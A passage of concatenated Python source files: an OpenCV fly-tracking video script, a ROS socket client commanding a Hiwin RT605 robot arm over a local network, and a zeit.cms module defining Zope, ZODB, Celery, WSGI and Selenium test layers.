cv2.imwrite(str(Path(self.saved_dir, f'{self.video_stem}_1_mask.bmp')), frame)
cv2.imwrite(str(Path(self.saved_dir, f'{self.video_stem}_1_src.bmp')), src)
return
cv2.imshow('mask', frame)
cv2.imshow('src', src)
cv2.waitKey(3)
i += 1
pbar.update(1)
if i >= self.duration_frames:
pbar.close()
break
pbar.close()
def play_and_show_trackingpoints(self, just_save_one_frame=False):
res = np.load(self.res_npy_path)
i = 0
print('showing...')
print('q: exit')
pbar = Pbar(total=self.duration_frames)
while True:
ret, frame = self.video.read()
if not ret:
pbar.close()
break
frame = self.undistort.do(frame)
for cp, tp in zip(self.cps, res[i]):
cv2.circle(frame, cp, self.dish_radius, (255, 0, 0), 1)
# cv2.circle(frame, cp, self.region_radius, (0, 255, 0), 1)
tp = (int(round(tp[0])), int(round(tp[1])))
# cv2.circle(frame, tp, 3, (0, 0, 255), -1)
cv2.line(frame, (tp[0] - 10, tp[1]), (tp[0] + 10, tp[1]), (0, 0, 255), 1)
cv2.line(frame, (tp[0], tp[1] - 10), (tp[0], tp[1] + 10), (0, 0, 255), 1)
if just_save_one_frame:
cv2.imwrite(str(Path(self.saved_dir, f'{self.video_stem}_3_frame.bmp')), frame)
return
cv2.imshow('frame', frame)
k = cv2.waitKey(3) & 0xFF
if chr(k) == 'q' or chr(k) == 'Q':
break
i += 1
pbar.update(1)
if i >= self.duration_frames:
pbar.close()
break
# pbar.close()
def run(self):
self.fly_centroids = []
self.fly_angles = []
pbar = Pbar(total=self.duration_frames)
i = 0
# print(f'begin_frame:{self.begin_frame} duration_frames:{self.duration_frames}')
# self.video.set(cv2.CAP_PROP_POS_FRAMES, 0)
# print(f'all_frames_nub:{self.video.get(cv2.CAP_PROP_FRAME_COUNT)}')
print('tracking...')
while True:
ret, frame = self.video.read()
if not ret:
# print('\nret break\n')
break
frame = self.undistort.do(frame)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
foreground_mask = np.abs(frame.astype(np.int16) - self.gray_bg_int16) > self.background_th
frame = frame < self.seg_th
frame *= self.mask_all
frame = frame.astype(np.uint8) * 255 * foreground_mask
            self.heatmap += frame.astype(bool).astype(int)
oneframe_centroids = []
oneframe_angles = []
for roi in self.rois:
img = frame[roi[0]:roi[1], roi[2]:roi[3]]
retval, labels, stats, centroids = cv2.connectedComponentsWithStats(img)
if retval < 2:
cent = (-1, -1)
ang = self.flyangle.outlier
else:
max_area_id = np.argmax(stats[1:, -1]) + 1
cent = centroids[max_area_id]
cent = (round(cent[0] + roi[2], 2),
round(cent[1] + roi[0], 2))
r = stats[max_area_id]
                    if r[-1] <= 4:  # the area is too small for a meaningful angle; return the outlier value directly
                        ang = self.flyangle.outlier
else:
small_bin_img = img[r[1]:r[1] + r[3], r[0]:r[0] + r[2]]
ang = self.flyangle(small_bin_img)
oneframe_centroids.append(cent)
oneframe_angles.append(ang)
self.fly_centroids.append(oneframe_centroids)
self.fly_angles.append(oneframe_angles)
i += 1
pbar.update()
if i >= self.duration_frames:
# print('\n>= break\n')
break
pbar.close()
self._save()
self.video.set(cv2.CAP_PROP_POS_FRAMES, self.begin_frame)
def _save(self):
        # A single run of the release build produces fairly large files, so the npy
        # file is the primary result; the txt below is written for the user's benefit.
        with open(self.res_txt_path, 'w') as f:
            # The computed begin_frame may overlap the previous run's results, so the
            # summed length of all results can differ from the total frame count;
            # record each run's start point on the first line.
            f.write(f'{self.begin_frame}\n')
for line in self.fly_centroids:
f.write(f'{line}\n')
np.save(self.res_npy_path, np.array(self.fly_centroids, dtype=np.float64))
np.save(self.fly_angles_path, np.array(self.fly_angles, dtype=np.float64))
np.save(self.heatmap_path, self.heatmap)
'''
Potential pitfall (confirmed):
[The total frame count OpenCV reports directly differs from the count obtained by reading frame by frame.]
Moreover, in multi-process runs, set()-ing to a time point and reading in segments can misbehave:
the per-segment frame counts sum to the number OpenCV reports directly, while plain
frame-by-frame reading disagrees, which is odd.
A similar issue has been raised on GitHub:
https://github.com/opencv/opencv/issues/9053
'''
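# A minimal sketch (hypothetical helper, not part of the pipeline) that makes the
# pitfall above observable: compare the frame count OpenCV reports with the number
# of frames that can actually be read.
def _count_frames_by_reading(video_path):
    cap = cv2.VideoCapture(str(video_path))
    reported = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
    actual = 0
    while cap.read()[0]:
        actual += 1
    cap.release()
    # `reported` and `actual` can disagree; see the GitHub issue linked above.
    return reported, actual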
# def pbarFilenubs(dir, total, fmt='*.npy'):
# pbar = Pbar(total=total)
# d = Path(dir)
# while True:
# if d.exists():
# filenub = len(list(d.rglob(fmt)))
# else:
# filenub = 0
# pbar.update(set=True, set_value=filenub)
# time.sleep(0.2)
#
#
# def fn(params):
# s = FlySeg(**params)
# s.run()
#
#
# def multiprocessing(seg_params, cpus=45):
# cap = cv2.VideoCapture(seg_params['video_path'])
# frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
# fps = round(cap.get(cv2.CAP_PROP_FPS))
# time = frames / fps / 60
#
# params = []
# for t in range(0, round(time), seg_params['duration_time']):
# params.append({**seg_params, 'begin_time': t, 'save_txt_name': f'{t:0>4d}.txt'})
#     FlySeg(**params[0])  # initialise once up front to compute the background image and centre points, so the pool workers don't each redo it
#
# print(f'total length: {len(params)}')
# kwargs = {
# 'dir': Path(Path(seg_params['video_path']).parent, Path(seg_params['video_path']).stem),
# 'total': len(params),
# 'fmt': '*.npy'
# }
# thr = Thread(target=pbarFilenubs, kwargs=kwargs)
# thr.start()
# pool = Pool(cpus)
# pool.map(fn, params)
# stop_thread(thr)
# print('done')
#
#
# def run(cf, mode, just_save_one_frame=True):
# args = ['video_path', 'h_num', 'w_num', 'duration_time', 'seg_th', 'background_th',
# 'area_th', 'minR_maxR_minD', 'dish_exclude', 'Undistortion_model_path']
# seg_params = {arg: cf[arg] for arg in args}
# seg_params_play = {
# **seg_params,
# 'save_txt_name': '0.txt',
# 'begin_time': 150,
# }
# if mode == 1:
# s = FlySeg(**seg_params_play)
# s.play(just_save_one_frame=just_save_one_frame)
# # s.run()
# elif mode == 2:
# t1 = time.time()
# multiprocessing(seg_params, cpus=cf['cpus'])
# print(f'time_used: {(time.time() - t1) / 60} minutes')
# elif mode == 3:
# s = FlySeg(**seg_params_play)
# s.play_and_show_trackingpoints(just_save_one_frame=just_save_one_frame)
if __name__ == '__main__':
# f = FlySeg(
# video_path=r'D:\Pycharm_Projects\qu_holmes_su_release\tests\demo.mp4',
# save_txt_name='0000.txt',
# begin_time=0,
# duration_time=1,
# # config_it=False,
# )
# f.run()
# f.play_and_show_trackingpoints()
cap = cv2.VideoCapture(r'Z:\dataset\qususu\0923\easyflytracker_test\202009231045.avi')
print(cap.get(cv2.CAP_PROP_FRAME_COUNT))
i = 0
while True:
ret, frame = cap.read()
if not ret: break
i += 1
print(i)
|
Hiwin_RT605_ArmCommand_Socket_20190627185509.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
Socket = 0
data = '0'  # initial value of the transmitted data
Arm_feedback = 1  # assume the arm is busy
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
    def __iter__(self):
        """Return the match method once, then stop"""
        yield self.match
        return  # plain return: raising StopIteration in a generator is a RuntimeError under PEP 479 (Python 3.7+)
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
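# Usage sketch for the switch helper above (values illustrative): each case()
# call tests the switched value, an empty case() acts as the default, and
# setting self.fall makes later cases match too (fall-through).
# for case in switch(socket_cmd.action):
#     if case(Taskcmd.Action_Type.PtoP):
#         ...  # handle point-to-point motion
#         break
#     if case():  # default
#         break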
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
def point_data(x,y,z,pitch,roll,yaw): ## receive pose data sent by the strategy side
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## receive arm-mode data sent by the strategy side
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
#Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## receive arm speed-mode data sent by the strategy side
global speed_mode_flag
socket_cmd.Speedmode = speedmode
def socket_talker(): ## create the server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##---------- socket packet transmission ----------##
##--------------- socket: transmit arm commands ---------------
def Socket_command():
global Socket,arm_mode_flag,data
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
            #------- set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
            #------- set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
            #------- set arm rapid & safe mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
        socket_cmd.action = 6  ## reset to the initial mode state
        print(data)
        print("Socket:", Socket)
        Socket.send(data.encode('utf-8'))  # send over the socket; the str must be encoded for transmission
##-----------socket client--------
def socket_client():
global Socket
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
print(Socket.recv(1024))
    Socket_feedback(Socket)  # the previous argument `s` was an undefined name here
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
    Socket = s
    while 1:
        feedback_str = Socket.recv(1024)
        # the arm side reports its state
        if str(feedback_str[2]) == '48':  # F: the arm is Ready to receive the next motion command
            state_feedback.ArmState = 0
        if str(feedback_str[2]) == '49':  # T: the arm is busy and cannot execute the next motion command
            state_feedback.ArmState = 1
        if str(feedback_str[2]) == '54':  # 6: strategy finished
            state_feedback.ArmState = 6
            print("shutdown")
        # confirm the send flag
        if str(feedback_str[4]) == '48':  # returned 0: false
            state_feedback.SentFlag = 0
        if str(feedback_str[4]) == '49':  # returned 1: true
            state_feedback.SentFlag = 1
        ##--------------- socket: transmit arm commands end ---------------
        if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
            break
##-----------socket client end--------
##---------- socket packet transmission end ----------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 6  ## set the initial mode state
    ## multithreading
    t = threading.Thread(target=socket_client)
    t.start()  # start the thread
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
    ## multithreading end
|
testing.py
|
from six import StringIO
from six.moves.urllib.parse import urljoin
from unittest import mock
import ZODB
import ZODB.DemoStorage
import base64
import celery.contrib.testing.app
import celery.contrib.testing.worker
import celery_longterm_scheduler
import contextlib
import copy
import datetime
import doctest
import gocept.httpserverlayer.custom
import gocept.jslint
import gocept.selenium
import gocept.testing.assertion
import inspect
import json
import kombu
import logging
import lxml.etree
import lxml.html
import os
import pkg_resources
import plone.testing
import plone.testing.zca
import plone.testing.zodb
import pyramid_dogpile_cache2
import pytest
import re
import selenium.webdriver
import six
import sys
import tempfile
import threading
import transaction
import unittest
import waitress.server
import webtest.lint
import xml.sax.saxutils
import zeit.cms.application
import zeit.cms.celery
import zeit.cms.workflow.mock
import zeit.cms.wsgi
import zeit.cms.zope
import zeit.connector.interfaces
import zeit.connector.mock
import zope.app.appsetup.product
import zope.app.publication.zopepublication
import zope.app.wsgi
import zope.component
import zope.component.hooks
import zope.error.interfaces
import zope.event
import zope.i18n.interfaces
import zope.interface
import zope.processlifetime
import zope.publisher.browser
import zope.security.management
import zope.security.proxy
import zope.security.testing
import zope.testbrowser.browser
import zope.testing.cleanup
import zope.testing.renormalizing
class LoggingLayer(plone.testing.Layer):
def setUp(self):
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('zeit').setLevel(logging.DEBUG)
logging.getLogger('zeit.cms.repository').setLevel(logging.INFO)
logging.getLogger('selenium').setLevel(logging.INFO)
logging.getLogger('bugsnag').setLevel(logging.FATAL)
logging.getLogger('waitress').setLevel(logging.ERROR)
LOGGING_LAYER = LoggingLayer()
class CeleryEagerLayer(plone.testing.Layer):
def setUp(self):
zeit.cms.celery.CELERY.conf.task_always_eager = True
def tearDown(self):
zeit.cms.celery.CELERY.conf.task_always_eager = False
CELERY_EAGER_LAYER = CeleryEagerLayer()
class ProductConfigLayer(plone.testing.Layer):
DELETE = object()
def __init__(self, config, package=None, patches=None,
name='ConfigLayer', module=None, bases=None):
if module is None:
module = inspect.stack()[1][0].f_globals['__name__']
super(ProductConfigLayer, self).__init__(
name=name, module=module, bases=bases)
if not package:
package = '.'.join(module.split('.')[:-1])
self.package = package
if isinstance(config, six.string_types): # BBB
config = self.loadConfiguration(config, package)
self.config = config
self.patches = patches or {}
def loadConfiguration(self, text, package):
return zope.app.appsetup.product.loadConfiguration(
StringIO(text))[package]
def setUp(self):
zope.app.appsetup.product.setProductConfiguration(
self.package, copy.deepcopy(self.config))
self.previous = {}
for package, config in self.patches.items():
previous = self.previous[package] = {}
product = zope.app.appsetup.product.getProductConfiguration(
package)
for key in config:
if product and key in product:
previous[key] = copy.deepcopy(product[key])
else:
previous[key] = self.DELETE
self._update(package, config)
def tearDown(self):
zope.app.appsetup.product.setProductConfiguration(self.package, None)
for package, config in self.previous.items():
self._update(package, config)
def testSetUp(self):
zope.app.appsetup.product.setProductConfiguration(
self.package, copy.deepcopy(self.config))
for package, config in self.patches.items():
self._update(package, config)
def _update(self, package, config):
product = zope.app.appsetup.product.getProductConfiguration(package)
if product is None:
zope.app.appsetup.product.setProductConfiguration(package, {})
product = zope.app.appsetup.product.getProductConfiguration(
package)
for key, value in config.items():
if value is self.DELETE:
product.pop(key, None)
else:
product[key] = copy.deepcopy(value)
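# A minimal usage sketch for ProductConfigLayer (package name and values are
# illustrative, not from a real package):
# EXAMPLE_CONFIG_LAYER = ProductConfigLayer(
#     {'some-key': 'some-value'}, package='zeit.example')
# Such a layer is then passed via bases=(...) to the ZCML/Zope layers below.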
class ZCMLLayer(plone.testing.Layer):
defaultBases = (LOGGING_LAYER,)
def __init__(self, config_file='ftesting.zcml',
name='ZCMLLayer', module=None, bases=()):
if module is None:
module = inspect.stack()[1][0].f_globals['__name__']
if not config_file.startswith('/'):
config_file = pkg_resources.resource_filename(module, config_file)
self.config_file = config_file
super(ZCMLLayer, self).__init__(
name=name, module=module, bases=self.defaultBases + bases)
def setUp(self):
# We'd be fine with calling zope.configuration directly here, but we
# need to make zope.app.appsetup.getConfigContext() work, which we
# cannot do from the outside due to name mangling, sigh.
#
# context = zope.configuration.config.ConfigurationMachine()
# zope.configuration.xmlconfig.registerCommonDirectives(context)
# zope.configuration.xmlconfig.file(self.config_file, context=context)
# context.execute_actions()
self['zcaRegistry'] = plone.testing.zca.pushGlobalRegistry()
self.assert_non_browser_modules_have_no_browser_zcml()
zeit.cms.zope._load_zcml(self.config_file)
def assert_non_browser_modules_have_no_browser_zcml(self):
# Caveat emptor: This whole method is a bunch of heuristics, but
# hopefully they are useful.
for browser in ['browser', 'json', 'xmlrpc']:
if '.' + browser in self.__module__:
return
if self.__module__.startswith('zeit.addcentral'):
# XXX This is a historical edge case.
return
configure_zcml = os.path.dirname(self.config_file) + '/configure.zcml'
if not os.path.exists(configure_zcml):
return # be defensive
zcml = open(configure_zcml).read().splitlines()
for directive in ['namespaces.zope.org/browser', 'gocept:pagelet']:
for i, line in enumerate(zcml):
if directive in line:
raise AssertionError(
'Browser-specific directive found in %s\n'
' %s: %s' % (configure_zcml, i, line))
def tearDown(self):
plone.testing.zca.popGlobalRegistry()
del self['zcaRegistry']
# We also need to clean up various other Zope registries here
# (permissions, tales expressions etc.), but the zope.testing mechanism
# to do that unfortunately also includes clearing the product config,
# which we do NOT want.
product = zope.app.appsetup.product.saveConfiguration()
zope.testing.cleanup.cleanUp()
zope.app.appsetup.product.restoreConfiguration(product)
def testSetUp(self):
self['zcaRegistry'] = plone.testing.zca.pushGlobalRegistry()
def testTearDown(self):
self['zcaRegistry'] = plone.testing.zca.popGlobalRegistry()
class ZODBLayer(plone.testing.Layer):
def setUp(self):
self['zodbDB-layer'] = ZODB.DB(ZODB.DemoStorage.DemoStorage(
name=self.__name__ + '-layer'))
def tearDown(self):
self['zodbDB-layer'].close()
del self['zodbDB-layer']
def testSetUp(self):
self['zodbDB'] = plone.testing.zodb.stackDemoStorage(
self['zodbDB-layer'], name=self.__name__)
self['zodbConnection'] = self['zodbDB'].open()
def testTearDown(self):
transaction.abort()
self['zodbConnection'].close()
del self['zodbConnection']
self['zodbDB'].close()
del self['zodbDB']
class MockConnectorLayer(plone.testing.Layer):
def testTearDown(self):
connector = zope.component.queryUtility(
zeit.connector.interfaces.IConnector)
if isinstance(connector, zeit.connector.mock.Connector):
connector._reset()
MOCK_CONNECTOR_LAYER = MockConnectorLayer()
class MockWorkflowLayer(plone.testing.Layer):
def testTearDown(self):
zeit.cms.workflow.mock.reset()
MOCK_WORKFLOW_LAYER = MockWorkflowLayer()
class CacheLayer(plone.testing.Layer):
def testTearDown(self):
pyramid_dogpile_cache2.clear()
DOGPILE_CACHE_LAYER = CacheLayer()
class ZopeLayer(plone.testing.Layer):
defaultBases = (
CELERY_EAGER_LAYER,
DOGPILE_CACHE_LAYER,
MOCK_CONNECTOR_LAYER,
MOCK_WORKFLOW_LAYER,
)
def __init__(self, name='ZopeLayer', module=None, bases=()):
if module is None:
module = inspect.stack()[1][0].f_globals['__name__']
super(ZopeLayer, self).__init__(
name=name, module=module,
# This is a bit kludgy. We need an individual ZODB layer per ZCML
# file (so e.g. different install generations are isolated), but
# we don't really want to have to create one per package.
bases=self.defaultBases + bases + (ZODBLayer(),))
def setUp(self):
zope.event.notify(zope.processlifetime.DatabaseOpened(
self['zodbDB-layer']))
transaction.commit()
with self.rootFolder(self['zodbDB-layer']):
pass
self['rootFolder'] = self.rootFolder
def tearDown(self):
del self['rootFolder']
@contextlib.contextmanager
def rootFolder(self, db):
"""Helper for other layers to access the ZODB.
We cannot leave a connection open after setUp, since it will join the
transactions that happen during the tests, which breaks because the
same DB is then joined twice. Thus we have to take care and close it
each time.
"""
connection = db.open()
root = connection.root()[
zope.app.publication.zopepublication.ZopePublication.root_name]
self._set_current_zca(root)
yield root
transaction.commit()
connection.close()
def testSetUp(self):
self['zodbApp'] = self['zodbConnection'].root()[
zope.app.publication.zopepublication.ZopePublication.root_name]
self._set_current_zca(self['zodbApp'])
transaction.commit()
def testTearDown(self):
zope.component.hooks.setSite(None)
zope.security.management.endInteraction()
del self['zodbApp']
def _set_current_zca(self, root):
site = zope.component.getSiteManager(root)
site.__bases__ = (self['zcaRegistry'],)
class WSGILayer(plone.testing.Layer):
def __init__(self, name='WSGILayer', module=None, bases=None):
if module is None:
module = inspect.stack()[1][0].f_globals['__name__']
super(WSGILayer, self).__init__(
name=name, module=module, bases=bases)
def setUp(self):
self['zope_app'] = zope.app.wsgi.WSGIPublisherApplication(
self['zodbDB-layer'])
self['wsgi_app'] = zeit.cms.wsgi.wsgi_pipeline(
self['zope_app'], [('fanstatic', 'egg:fanstatic#fanstatic')],
{'fanstatic.' + key: value for key, value
in zeit.cms.application.FANSTATIC_SETTINGS.items()})
def testSetUp(self):
# Switch database to the currently active DemoStorage.
# Adapted from gocept.httpserverlayer.zopeapptesting.TestCase
application = self['zope_app']
factory = type(application.requestFactory)
application.requestFactory = factory(self['zodbDB'])
def tearDown(self):
del self['wsgi_app']
del self['zope_app']
class CeleryWorkerLayer(plone.testing.Layer):
"""Sets up a thread-layerd celery worker.
Modeled after celery.contrib.testing.pytest.celery_session_worker and
celery_session_app.
"""
queues = (
'default', 'publish_homepage', 'publish_highprio', 'publish_lowprio',
'publish_default', 'publish_timebased', 'webhook')
default_queue = 'default'
def __init__(self, name='CeleryLayer', module=None, bases=None):
if module is None:
module = inspect.stack()[1][0].f_globals['__name__']
super(CeleryWorkerLayer, self).__init__(
name=name, module=module, bases=bases)
def setUp(self):
self['celery_app'] = zeit.cms.celery.CELERY
self['celery_previous_config'] = dict(self['celery_app'].conf)
self['celery_app'].conf.update(
celery.contrib.testing.app.DEFAULT_TEST_CONFIG)
self['celery_app'].conf.update({
'task_always_eager': False,
'task_create_missing_queues': False,
'task_default_queue': self.default_queue,
'task_queues': [kombu.Queue(q) for q in self.queues],
'task_send_sent_event': True, # So we can inspect routing in tests
'longterm_scheduler_backend': 'memory://',
'TESTING': True,
'ZODB': self['zodbDB-layer'],
})
self.reset_celery_app()
self['celery_worker'] = celery.contrib.testing.worker.start_worker(
self['celery_app'])
self['celery_worker'].__enter__()
def reset_celery_app(self):
# Reset cached_property values that depend on app.conf values, after
# config has been changed.
cls = type(self['celery_app'])
for name in dir(cls):
prop = getattr(cls, name)
if isinstance(prop, kombu.utils.objects.cached_property):
self['celery_app'].__dict__.pop(name, None)
def testSetUp(self):
# Switch database to the currently active DemoStorage,
# see zeit.cms.testing.WSGILayer.testSetUp().
self['celery_app'].conf['ZODB'] = self['zodbDB']
celery_longterm_scheduler.get_scheduler(
self['celery_app']).backend.__init__(None, None)
def tearDown(self):
self['celery_worker'].__exit__(None, None, None)
del self['celery_worker']
# This should remove any config additions made by us.
self['celery_app'].conf.clear()
self['celery_app'].conf.update(self['celery_previous_config'])
del self['celery_previous_config']
self.reset_celery_app()
del self['celery_app']
# celery.contrib.testing.worker expects a 'ping' task, so it can check that the
# worker is running properly.
@zeit.cms.celery.task(name='celery.ping')
def celery_ping():
return 'pong'
class RecordingRequestHandler(gocept.httpserverlayer.custom.RequestHandler):
response_code = 200
response_headers = {}
response_body = '{}'
def do_GET(self):
length = int(self.headers.get('content-length', 0))
self.requests.append(dict(
verb=self.command,
path=self.path,
headers=self.headers,
body=self.rfile.read(length).decode('utf-8') if length else None,
))
self.send_response(self._next('response_code'))
for key, value in self._next('response_headers').items():
self.send_header(key, value)
self.end_headers()
self.wfile.write(six.ensure_binary(self._next('response_body')))
def _next(self, name):
result = getattr(self, name)
if isinstance(result, list):
result = result.pop(0)
return result
do_POST = do_GET
do_PUT = do_GET
do_DELETE = do_GET
class HTTPLayer(gocept.httpserverlayer.custom.Layer):
def testSetUp(self):
super(HTTPLayer, self).testSetUp()
self['request_handler'].requests = []
self['request_handler'].response_headers = {}
self['request_handler'].response_body = '{}'
self['request_handler'].response_code = 200
cms_product_config = """\
<product-config zeit.cms>
environment testing
source-access file://{base}/content/access.xml
source-serie file://{base}/content/serie.xml
source-ressorts file://{base}/content/ressorts.xml
source-keyword file://{base}/content/zeit-ontologie-prism.xml
source-products file://{base}/content/products.xml
source-badges file://{base}/asset/badges.xml
source-channels file://{base}/content/ressorts.xml
source-storystreams file://{base}/content/storystreams.xml
source-printressorts file://{base}/content/print-ressorts.xml
source-manual file://{base}/content/manual.xml
config-retractlog file://{base}/retractlog/retractlog.xml
checkout-lock-timeout 3600
checkout-lock-timeout-temporary 30
preview-prefix http://localhost/preview-prefix/
live-prefix http://localhost/live-prefix/
friebert-wc-preview-prefix /wcpreview
breadcrumbs-use-common-metadata true
cache-regions config, feature, newsimport, dav
cache-expiration-config 600
cache-expiration-feature 15
cache-expiration-newsimport 1
cache-expiration-dav 0
feature-toggle-source file://{base}/content/feature-toggle.xml
sso-cookie-name-prefix my_sso_
sso-cookie-domain
sso-expiration 300
sso-algorithm RS256
sso-private-key-file {base}/tests/sso-private.pem
source-api-mapping product=zeit.cms.content.sources.ProductSource
# We just need a dummy XML file
checkin-webhook-config file://{base}/content/access.xml
</product-config>
""".format(
base=pkg_resources.resource_filename(__name__, ''))
CONFIG_LAYER = ProductConfigLayer(cms_product_config)
ZCML_LAYER = ZCMLLayer('ftesting.zcml', bases=(CONFIG_LAYER,))
ZOPE_LAYER = ZopeLayer(bases=(ZCML_LAYER,))
WSGI_LAYER = WSGILayer(bases=(ZOPE_LAYER,))
# Layer API modelled after gocept.httpserverlayer.wsgi
class WSGIServerLayer(plone.testing.Layer):
port = 0 # choose automatically
def __init__(self, *args, **kw):
super(WSGIServerLayer, self).__init__(*args, **kw)
self.wsgi_app = None
@property
def wsgi_app(self):
return self.get('wsgi_app', self._wsgi_app)
@wsgi_app.setter
def wsgi_app(self, value):
self._wsgi_app = value
@property
def host(self):
return os.environ.get('GOCEPT_HTTP_APP_HOST', 'localhost')
def setUp(self):
self['httpd'] = waitress.server.create_server(
self.wsgi_app, host=self.host, port=0, ipv6=False,
clear_untrusted_proxy_headers=True)
if isinstance(self['httpd'], waitress.server.MultiSocketServer):
self['http_host'] = self['httpd'].effective_listen[0][0]
self['http_port'] = self['httpd'].effective_listen[0][1]
else:
self['http_host'] = self['httpd'].effective_host
self['http_port'] = self['httpd'].effective_port
self['http_address'] = '%s:%s' % (self['http_host'], self['http_port'])
self['httpd_thread'] = threading.Thread(target=self['httpd'].run)
self['httpd_thread'].daemon = True
self['httpd_thread'].start()
def tearDown(self):
self['httpd'].close()
self['httpd_thread'].join(5)
if self['httpd_thread'].is_alive():
raise RuntimeError('WSGI server could not be shut down')
del self['httpd']
del self['httpd_thread']
del self['http_host']
del self['http_port']
del self['http_address']
HTTP_LAYER = WSGIServerLayer(name='HTTPLayer', bases=(WSGI_LAYER,))
class WebdriverLayer(gocept.selenium.WebdriverLayer):
# copy&paste from superclass to customize the ff binary, and to note that
# chrome indeed does support non-headless now.
def _start_selenium(self):
if self._browser == 'firefox':
options = selenium.webdriver.FirefoxOptions()
# The default 'info' is still way too verbose
options.log.level = 'error'
if self.headless:
options.add_argument('-headless')
options.binary = os.environ.get('GOCEPT_WEBDRIVER_FF_BINARY')
self['seleniumrc'] = selenium.webdriver.Firefox(
firefox_profile=self.profile, options=options)
if self._browser == 'chrome':
options = selenium.webdriver.ChromeOptions()
if self.headless:
options.add_argument('--headless')
self['seleniumrc'] = selenium.webdriver.Chrome(
options=options,
service_args=['--log-path=chromedriver.log'])
WD_LAYER = WebdriverLayer(name='WebdriverLayer', bases=(HTTP_LAYER,))
WEBDRIVER_LAYER = gocept.selenium.WebdriverSeleneseLayer(
name='WebdriverSeleneseLayer', bases=(WD_LAYER,))
# XXX Hopefully not necessary once we're on py3
class OutputChecker(zope.testing.renormalizing.RENormalizing):
string_prefix = re.compile(r"(\W|^)[uUbB]([rR]?[\'\"])", re.UNICODE)
